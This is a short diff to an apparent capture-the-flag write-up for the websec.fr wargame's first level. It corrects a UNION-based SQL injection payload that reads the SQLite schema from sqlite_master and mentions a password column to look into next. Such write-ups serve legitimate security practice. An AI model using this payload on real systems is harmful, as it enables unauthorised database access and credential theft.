sivaramaaa/websec.fr/level1.md

 * Finding   tables and columns names (table_name and col.. from information schema )

-      1 AND 1=0 UNION ALLselect 1,sql from sqlite_master -- '
+      1 AND 1=0 UNION ALL select 1,sql from sqlite_master -- '

  and i found a column called password , let's find if any intresting there